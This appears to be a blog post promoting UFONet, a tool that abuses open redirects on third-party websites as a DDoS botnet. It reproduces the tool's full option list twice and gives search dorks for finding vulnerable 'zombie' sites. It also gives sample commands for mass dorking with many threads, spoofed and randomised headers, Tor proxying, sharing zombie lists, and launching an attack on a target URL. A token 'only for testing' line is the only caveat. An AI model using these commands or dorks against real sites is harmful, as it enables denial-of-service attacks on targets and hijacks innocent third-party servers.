UFONet is an open redirect DDoS tool designed to launch attacks against a target, using insecure redirects in third party web applications, like a botnet. Obviously, only for testing purposes.
The tool abuses OSI Layer 7-HTTP to create/manage ‘zombies’ and to conduct different attacks using; GET/POST, multi-threading, proxies, origin spoofing methods, cache evasion techniques, etc.
Definition of an “Open Redirect”:
An http parameter may contain a URL value and could cause the web application to redirect the request to the specified URL. By modifying the URL value to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials. Because the server name in the modified link is identical to the original site, phishing attempts have a more trustworthy appearance.
From: CWE-601: URL Redirection to Untrusted Site (‘Open Redirect’)
Usage
*Configure Request(s)*:
–proxy=PROXY Use proxy server (tor: ‘http://127.0.0.1:8118’)
–user-agent=AGENT Use another HTTP User-Agent header (default SPOOFED)
–referer=REFERER Use another HTTP Referer header (default SPOOFED)
–host=HOST Use another HTTP Host header (default NONE)
–xforw Set your HTTP X-Forwarded-For with random IP values
–xclient Set your HTTP X-Client-IP with random IP values
–timeout=TIMEOUT Select your timeout (default 10)
–retries=RETRIES Retries when the connection timeouts (default 1)
–threads=THREADS Maximum number of concurrent HTTP requests (default 5)
–delay=DELAY Delay in seconds between each HTTP request (default 0)
*Search for ‘Zombies’*:
-s SEARCH Search from a ‘dork’ (ex: -s ‘proxy.php?url=’)
–sd=DORKS Search from a list of ‘dorks’ (ex: –sd ‘dorks.txt’)
–sn=NUM_RESULTS Set max number of results for engine (default 10)
–se=ENGINE Search engine to use for ‘dorking’ (default: duck)
–sa Search massively using all search engines
*Test Botnet*:
-t TEST Update ‘zombies’ status (ex: -t ‘zombies.txt’)
–attack-me Order ‘zombies’ to attack you (NAT required!)
*Community*:
–download-zombies Download ‘zombies’ from Community server: Turina
–upload-zombies Upload your ‘zombies’ to Community server: Turina
–blackhole Create a ‘blackhole’ to share your ‘zombies’
–up-to=UPIP Upload your ‘zombies’ to a ‘blackhole’
–down-from=DIP Download your ‘zombies’ from a ‘blackhole’
*Research Target*:
-i INSPECT Search for biggest file (ex: -i ‘http://target.com’)
*Configure Attack(s)*:
–disable-aliens Disable ‘aliens’ web abuse of test services
–disable-isup Disable check status ‘is target up?’
-r ROUNDS Set number of rounds (default: 1)
-b PLACE Set place to attack (ex: -b ‘/path/big.jpg’)
-a TARGET Start Web DDoS attack (ex: -a ‘http(s)://target.com’)
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 |
Options: —version show program‘s version number and exit -h, –help show this help message and exit -v, –verbose active verbose on requests –update check for latest stable version –check-tor check to see if Tor is used properly –force-yes set ‘YES‘ to all questions –disableisup disable external check of target’s status —gui run GUI (UFONet Web Interface) *Configure Request(s)*: —proxy=PROXY Use proxy server (tor: ‘http://127.0.0.1:8118’) —user–agent=AGENT Use another HTTP User–Agent header (default SPOOFED) —referer=REFERER Use another HTTP Referer header (default SPOOFED) —host=HOST Use another HTTP Host header (default NONE) —xforw Set your HTTP X–Forwarded–For with random IP values —xclient Set your HTTP X–Client–IP with random IP values —timeout=TIMEOUT Select your timeout (default 10) —retries=RETRIES Retries when the connection timeouts (default 1) —threads=THREADS Maximum number of concurrent HTTP requests (default 5) —delay=DELAY Delay in seconds between each HTTP request (default 0) *Search for ‘Zombies’*: –s SEARCH Search from a ‘dork’ (ex: –s ‘proxy.php?url=’) —sd=DORKS Search from a list of ‘dorks’ (ex: —sd ‘dorks.txt’) —sn=NUM_RESULTS Set max number of results for engine (default 10) —se=ENGINE Search engine to use for ‘dorking’ (default: duck) —sa Search massively using all search engines *Test Botnet*: –t TEST Update ‘zombies’ status (ex: –t ‘zombies.txt’) —attack–me Order ‘zombies’ to attack you (NAT required!) *Community*: —download–zombies Download ‘zombies’ from Community server: Turina —upload–zombies Upload your ‘zombies’ to Community server: Turina —blackhole Create a ‘blackhole’ to share your ‘zombies’ —up–to=UPIP Upload your ‘zombies’ to a ‘blackhole’ —down–from=DIP Download your ‘zombies’ from a ‘blackhole’ *Research Target*: –i INSPECT Search for biggest file (ex: –i ‘http://target.com’) *Configure Attack(s)*: —disable–aliens Disable ‘aliens’ web abuse of test services —disable–isup Disable check status ‘is target up?’ –r ROUNDS Set number of rounds (default: 1) –b PLACE Set place to attack (ex: –b ‘/path/big.jpg’) –a TARGET Start Web DDoS attack (ex: –a ‘http(s)://target.com’) |
Searching for ‘Zombies’
UFONet can dig on different search engines results to find possible ‘Open Redirect’ vulnerable sites. A common query string should be like this:
‘proxy.php?url=’ ‘check.cgi?url=’ ‘checklink?uri=’ ‘validator?uri=’ |
For example you can begin a search with:
1 |
./ufonet –s ‘proxy.php?url=’ |
Or providing a list of “dorks” from a file:
1 |
./ufonet —sd ‘dorks.txt’ |
By default UFONet will uses a search engine called ‘duck’. But you can choose a different one:
1 |
./ufonet –s ‘proxy.php?url=’ —se ‘bing’ |
This is the list of available search engines with last time that were working:
– duck [07/10/2015: OK!] – google [07/10/2015: OK!] – bing [07/10/2015: OK!] – yahoo [07/10/2015: OK!] – yandex [07/10/2015: OK!] |
You can also search massively using all search engines supported:
1 |
./ufonet –s ‘proxy.php?url=’ —sa |
To control how many ‘zombies’ recieve from search engines you can use:
1 |
./ufonet —sd ‘dorks.txt’ —sa —sn 20 |
At the end of the process, you will be asked if you want to check the list retrieved to see if the urls are vulnerable.
1 |
Wanna check if they are valid zombies? (Y/n) |
Also, you will be asked to update the list adding automatically only ‘vulnerable’ web apps.
1 |
Wanna update your list (Y/n) |
If you reply ‘Y’ your new ‘zombies’ will be appended to the file named: zombies.txt
Examples:
+ with verbose: ./ufonet –s ‘proxy.php?url=’ –v + with threads: ./ufonet —sd ‘dorks.txt’ —sa —threads 100 |
You can download UFOnet here:
1 |
git clone https://github.com/epsylon/ufonet |
Or read more here.